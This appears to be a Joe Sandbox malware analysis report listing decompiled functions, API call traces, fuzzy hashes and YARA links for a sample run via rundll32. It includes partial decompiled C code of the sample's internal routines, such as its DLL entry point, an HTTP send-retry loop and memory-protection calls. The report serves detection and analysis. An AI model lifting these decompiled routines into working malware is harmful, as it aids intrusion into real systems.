                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$CreateDestroyFreeString
                                                          • String ID:
                                                          • API String ID: 3098518882-0
                                                          • Opcode ID: 231115aa51eb674db7b9882dca1760211261c2d369b2e6d4ea0aebc2b4597519
                                                          • Instruction ID: b26862ea45ab933230be6517fcfb82dc761d60903b3372fdad0b220b63a77325
                                                          • Opcode Fuzzy Hash: 231115aa51eb674db7b9882dca1760211261c2d369b2e6d4ea0aebc2b4597519
                                                          • Instruction Fuzzy Hash: 8A11527690020ABFDB10DFA5DC45AEEBBB9EB04351F004865FA04F7161D3749A19DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055811FB, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • memset.NTDLL ref: 05581219
                                                            • Part of subcall function 05589776: memset.NTDLL ref: 0558979C
                                                            • Part of subcall function 05589776: memcpy.NTDLL ref: 055897C4
                                                            • Part of subcall function 05589776: GetLastError.KERNEL32(00000010,00000218,05594EAD,00000100,?,00000318,00000008), ref: 055897DB
                                                            • Part of subcall function 05589776: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,05594EAD,00000100), ref: 055898BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastmemset$AllocateHeapmemcpy
                                                          • String ID: tLWj
                                                          • API String ID: 4290293647-3825524646
                                                          • Opcode ID: 4f05ab84869ab89dba04aefb861e7fca713a04a29013f73e4cff728d23cceeff
                                                          • Instruction ID: 125c7617992294dba728b7f781950c71026fd32e60f286af1afaf1822cfd89e6
                                                          • Opcode Fuzzy Hash: 4f05ab84869ab89dba04aefb861e7fca713a04a29013f73e4cff728d23cceeff
                                                          • Instruction Fuzzy Hash: FA01FD30601B096BC721EE6ADC44FAB3BE9BF85710F00842AFC46A6240D774E905CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E55F4F, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(00E53E52), ref: 00E55F69
                                                            • Part of subcall function 00E53969: SysFreeString.OLEAUT32(?), ref: 00E53A48
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E55FA9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 3ce929ee460371d817ccc02dd7be3ad77a5d33b2aa264aa509c3cd41f2d2a088
                                                          • Instruction ID: e9060e3aea2d8d58acc48ddb3d46db40abf36f7a30b322cfe881cd8c3e0bd76e
                                                          • Opcode Fuzzy Hash: 3ce929ee460371d817ccc02dd7be3ad77a5d33b2aa264aa509c3cd41f2d2a088
                                                          • Instruction Fuzzy Hash: 8A014F7650160AFFCB119FA9D809DEFBBB9EF44311F100821FD05B6161D7709A199BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05571794, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557179E
                                                          • RtlLeaveCriticalSection.NTDLL(0559C300), ref: 055717DA
                                                            • Part of subcall function 05592EC9: lstrlen.KERNEL32(?,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F16
                                                            • Part of subcall function 05592EC9: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F28
                                                            • Part of subcall function 05592EC9: lstrcpy.KERNEL32(00000000,?), ref: 05592F37
                                                            • Part of subcall function 05592EC9: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F48
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 1872894792-0
                                                          • Opcode ID: 9e8439a3484179b57814b250b8278f2f3d15d9349caaac8efdda0d7b63a93400
                                                          • Instruction ID: fd8e49455aaa3ef5ed5cf384f491a0d5ff3607d1104ac55b0966b1c2f6d3f696
                                                          • Opcode Fuzzy Hash: 9e8439a3484179b57814b250b8278f2f3d15d9349caaac8efdda0d7b63a93400
                                                          • Instruction Fuzzy Hash: E9F0233A30121DAF8F246F99A5C9875FBB8FB8A151306024FF95653300CF755C00D790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557BCB3, Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0559BFFC), ref: 0557BCC8
                                                            • Part of subcall function 055909D7: GetSystemTimeAsFileTime.KERNEL32(?), ref: 05590A02
                                                            • Part of subcall function 055909D7: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05590A0F
                                                            • Part of subcall function 055909D7: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 05590A9B
                                                            • Part of subcall function 055909D7: GetModuleHandleA.KERNEL32(00000000), ref: 05590AA6
                                                            • Part of subcall function 055909D7: RtlImageNtHeader.NTDLL(00000000), ref: 05590AAF
                                                            • Part of subcall function 055909D7: RtlExitUserThread.NTDLL(00000000), ref: 05590AC4
                                                          • InterlockedDecrement.KERNEL32(0559BFFC), ref: 0557BCEC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                                          • String ID:
                                                          • API String ID: 1011034841-0
                                                          • Opcode ID: 836311287e81fcf931bf16859596965af73d9f4bc9d2c16eaaff0aa0a440718c
                                                          • Instruction ID: 8f490a513beb5fadc8479769e204f7f88a8275342ee0bb3824d2ce762f9ccc8f
                                                          • Opcode Fuzzy Hash: 836311287e81fcf931bf16859596965af73d9f4bc9d2c16eaaff0aa0a440718c
                                                          • Instruction Fuzzy Hash: FCE0D87334C12B9BDB215A76BC08B3ABA5EBB406B0F01CD15FCC2D1050EF24C49096D5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E5694D, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xe5a294) == 0) {
						E00E5566B();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xe5a294) == 1) {
						_t10 = E00E5682B(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}







                                                          0x00e56954
                                                          0x00e56955
                                                          0x00e56958
                                                          0x00e5698a
                                                          0x00e5698c
                                                          0x00e5698c
                                                          0x00e5695a
                                                          0x00e5695b
                                                          0x00e56970
                                                          0x00e56977
                                                          0x00e56979
                                                          0x00e56979
                                                          0x00e56977
                                                          0x00e5695b
                                                          0x00e56994

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(00E5A294), ref: 00E56962
                                                            • Part of subcall function 00E5682B: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001), ref: 00E56840
                                                          • InterlockedDecrement.KERNEL32(00E5A294), ref: 00E56982
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: 64ee9e4e07e6bfbc4a2bf5681e77dc20cd39d1868a5eab0724d4164a4de5ccaa
                                                          • Instruction ID: 8467b9abb5ad84d2f72bcb1475f326ec9416de30bf7f133a475e8593fa06bb95
                                                          • Opcode Fuzzy Hash: 64ee9e4e07e6bfbc4a2bf5681e77dc20cd39d1868a5eab0724d4164a4de5ccaa
                                                          • Instruction Fuzzy Hash: 92E01A352083229ACA356B648C45B9E6790AB95B4BF847E24BD85F30A1CB30984D9292
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E56997, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E56997(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E00E541D4(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E00E513CC(_a4);
				}
				return _t12;
			}





                                                          0x00e569a3
                                                          0x00e569a8
                                                          0x00e569ac
                                                          0x00e569b3
                                                          0x00e569be
                                                          0x00e569c2
                                                          0x00e569c2
                                                          0x00e569cb

                                                          APIs
                                                            • Part of subcall function 00E541D4: memcpy.NTDLL(00000000,00000110,{Q,{Q,?,?,?,?,?,00E552EA,?), ref: 00E5420A
                                                            • Part of subcall function 00E541D4: memset.NTDLL ref: 00E54280
                                                            • Part of subcall function 00E541D4: memset.NTDLL ref: 00E54294
                                                          • memcpy.NTDLL({Q,?,00000000,{Q,?,?,?,?,00E552EA,?,?,{Q,?), ref: 00E569B3
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpymemset$FreeHeap
                                                          • String ID: {Q
                                                          • API String ID: 3053036209-1336059103
                                                          • Opcode ID: 13af1243c0b10fe6991d438999edb1d00b27d356b3e8aba016f0faff810b262d
                                                          • Instruction ID: bda5de961c2087f11ece6d5b809f7b7487febca00571b96ee44877c3b0d55efe
                                                          • Opcode Fuzzy Hash: 13af1243c0b10fe6991d438999edb1d00b27d356b3e8aba016f0faff810b262d
                                                          • Instruction Fuzzy Hash: 33E08CB6401529B6CB122A94DC01EEFBF9C8F52792F005824FF48AA211D631DA68A3E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557C2EC, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,055985A0,0000002C,05585C21,059B8E6E,?,00000000,055897A9,?,00000318), ref: 0557C306
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeVirtual
                                                          • String ID: u
                                                          • API String ID: 1263568516-4067256894
                                                          • Opcode ID: 031d7f351d0a79a76bbb1f94972cc00121d3d9a196d24fa8b5804e02ade87353
                                                          • Instruction ID: 6bf95b8d719e0c466f730e3d70d5e3967dfd50b335235a1feeb7bcfbe0f7b40d
                                                          • Opcode Fuzzy Hash: 031d7f351d0a79a76bbb1f94972cc00121d3d9a196d24fa8b5804e02ade87353
                                                          • Instruction Fuzzy Hash: 02D01731E00219DBCF219BA4E84A99FFB71BF08710F608224E56173190C6341955DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E55DD0, Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 32%
                                                          			E00E55DD0(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x7042e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                                                          0x00e55dd7
                                                          0x00e55de4
                                                          0x00e55de6
                                                          0x00e55de9
                                                          0x00e55e2e
                                                          0x00e55e36
                                                          0x00e55e3c
                                                          0x00e55e40
                                                          0x00000000
                                                          0x00000000
                                                          0x00e55ded
                                                          0x00e55df8
                                                          0x00e55dfb
                                                          0x00e55e2c
                                                          0x00000000
                                                          0x00000000
                                                          0x00e55dfd
                                                          0x00e55e00
                                                          0x00e55e07
                                                          0x00e55e0b
                                                          0x00e55e14
                                                          0x00e55e1c
                                                          0x00e55e4a
                                                          0x00e55e1e
                                                          0x00e55e1e
                                                          0x00000000
                                                          0x00e55e1e
                                                          0x00e55e1c
                                                          0x00e55e07
                                                          0x00e55e4d
                                                          0x00e55e54
                                                          0x00e55e54
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID:
                                                          • API String ID: 1452528299-0
                                                          • Opcode ID: 9c06ca2052c0ef8adf9ef9a4144b0c093e624ce9c3dd99ee71f48b7bacddf210
                                                          • Instruction ID: b22cc31ecbfd7165d7c4b22eacdc4e101d2a9984f2a98d3cc686b141d541c74a
                                                          • Opcode Fuzzy Hash: 9c06ca2052c0ef8adf9ef9a4144b0c093e624ce9c3dd99ee71f48b7bacddf210
                                                          • Instruction Fuzzy Hash: 24015736900619FBCF109F96C8599EEBBB8EB84756F208866E900F2150DB708B48DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557FA9C, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?), ref: 0557FAB1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: a22b34d015c4d48b50f3aecc00bc1633a1dbe193eb0061afec7356939a2aec7f
                                                          • Instruction ID: 9c117e7cc19368c6e6ee9bb3a02a190e04f083e635eb3bb5c3aea3cc56313502
                                                          • Opcode Fuzzy Hash: a22b34d015c4d48b50f3aecc00bc1633a1dbe193eb0061afec7356939a2aec7f
                                                          • Instruction Fuzzy Hash: F5313CB1A00619EFCB10DF98E495DADBBB5FF48324F55806AE209EB200D734AD45DF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E56FEA, Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E00E56FEA(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0xe5a290, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                                                          0x00e56fef
                                                          0x00e56ff4
                                                          0x00e57002
                                                          0x00e57008
                                                          0x00e5700c
                                                          0x00e5707d
                                                          0x00e5700e
                                                          0x00e57012
                                                          0x00e57015
                                                          0x00e57018
                                                          0x00e5701f
                                                          0x00e57020
                                                          0x00e57021
                                                          0x00e57025
                                                          0x00e57028
                                                          0x00e5702f
                                                          0x00e57035
                                                          0x00e57036
                                                          0x00e57036
                                                          0x00e5703d
                                                          0x00e5703e
                                                          0x00e5703f
                                                          0x00e57043
                                                          0x00e5704f
                                                          0x00e57055
                                                          0x00e57056
                                                          0x00e57056
                                                          0x00e57058
                                                          0x00e5705e
                                                          0x00e57060
                                                          0x00e57065
                                                          0x00e57066
                                                          0x00e57066
                                                          0x00e5706c
                                                          0x00e57075
                                                          0x00e57077
                                                          0x00e5707a
                                                          0x00e57089

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00E57002
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ea724e61b3a5a9e886806b1c16888947bd5e526ad2106bf99e9ded861f54cf59
                                                          • Instruction ID: 132f1d4c0283f9a63f3ad57b365e1c23df989ac5cf3ee77784cef136ced7cdc3
                                                          • Opcode Fuzzy Hash: ea724e61b3a5a9e886806b1c16888947bd5e526ad2106bf99e9ded861f54cf59
                                                          • Instruction Fuzzy Hash: 541129712493449FEB058F29D851BE97BA5DB23359F14508EE880AB2D2C277890FC760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557669F, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?), ref: 055766DA
                                                            • Part of subcall function 0558F7F5: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0559C300), ref: 0558F80C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HandleInformationModuleProcessQuery
                                                          • String ID:
                                                          • API String ID: 2776635927-0
                                                          • Opcode ID: 086c94e212cd88c33070958ba02936cf3e5e4bb6a8b5cfa18eef0d98c2e2a031
                                                          • Instruction ID: 6d0c7a61c2e033c85c06390278b60d1a74539fdd209340657942109c4b9ec96d
                                                          • Opcode Fuzzy Hash: 086c94e212cd88c33070958ba02936cf3e5e4bb6a8b5cfa18eef0d98c2e2a031
                                                          • Instruction Fuzzy Hash: 7D21CD75300A49EFDB20DF9AE990D6977A9FF402D0724846EE946CB210EB31ED00CB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557CCB6, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0557CD08
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 3b7a15c016b54e592f896d866459540557639abd144d3f02bf9fd363e312236f
                                                          • Instruction ID: 45800e719039ff82d706b9d2569431b4494bd9ac17207d9674ae390a9c70ce25
                                                          • Opcode Fuzzy Hash: 3b7a15c016b54e592f896d866459540557639abd144d3f02bf9fd363e312236f
                                                          • Instruction Fuzzy Hash: 4311CC3220420DAFDF019F99DC419DA7FA9FF49370B058125FD2996160C735DD21DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E55ED2, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 34%
                                                          			E00E55ED2(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xe5a2d4; // 0x435d5a8
				_t4 = _t15 + 0xe5b394; // 0x51b893c
				_t20 = _t4;
				_t6 = _t15 + 0xe5b124; // 0x650047
				_t17 = E00E53969(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00E57206(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                          0x00e55edc
                                                          0x00e55ede
                                                          0x00e55ee5
                                                          0x00e55ee6
                                                          0x00e55ee7
                                                          0x00e55ee8
                                                          0x00e55eee
                                                          0x00e55ef3
                                                          0x00e55ef3
                                                          0x00e55efd
                                                          0x00e55f0f
                                                          0x00e55f16
                                                          0x00e55f45
                                                          0x00e55f18
                                                          0x00e55f1d
                                                          0x00e55f42
                                                          0x00e55f1f
                                                          0x00e55f22
                                                          0x00e55f29
                                                          0x00e55f34
                                                          0x00e55f2b
                                                          0x00e55f2e
                                                          0x00e55f2e
                                                          0x00e55f38
                                                          0x00e55f38
                                                          0x00e55f1d
                                                          0x00e55f4c

                                                          APIs
                                                            • Part of subcall function 00E53969: SysFreeString.OLEAUT32(?), ref: 00E53A48
                                                            • Part of subcall function 00E57206: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00E567B6,004F0053,00000000,?), ref: 00E5720F
                                                            • Part of subcall function 00E57206: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00E567B6,004F0053,00000000,?), ref: 00E57239
                                                            • Part of subcall function 00E57206: memset.NTDLL ref: 00E5724D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E55F38
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeString$lstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 397948122-0
                                                          • Opcode ID: bfbe14b0c19e73e98c5a344f43ac4b899657e47d34cdcc9acd5cee96e876907e
                                                          • Instruction ID: aa70cf6affcb2362a920273a534b2104a9aa56f8293eca775c9f1072113d7eb4
                                                          • Opcode Fuzzy Hash: bfbe14b0c19e73e98c5a344f43ac4b899657e47d34cdcc9acd5cee96e876907e
                                                          • Instruction Fuzzy Hash: 84019E32600529FFDB219FA8CC04DAEBBB8FB04711F001C65F901F6021D3B099198BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E55963, Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 89%
                                                          			E00E55963(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E00E56FEA(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0xe5a2d4; // 0x435d5a8
						_t9 = _t17 + 0xe5b9e8; // 0x444f4340
						_t20 = E00E515AB( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0xe5a290, 0, _a4); // executed
					}
				}
				return _t26;
			}








                                                          0x00e55966
                                                          0x00e5596c
                                                          0x00e559c3
                                                          0x00e55972
                                                          0x00e5597d
                                                          0x00e55982
                                                          0x00e55986
                                                          0x00e55993
                                                          0x00e5599b
                                                          0x00e559a7
                                                          0x00e559af
                                                          0x00e559b9
                                                          0x00e559b9
                                                          0x00e55986
                                                          0x00e559c8

                                                          APIs
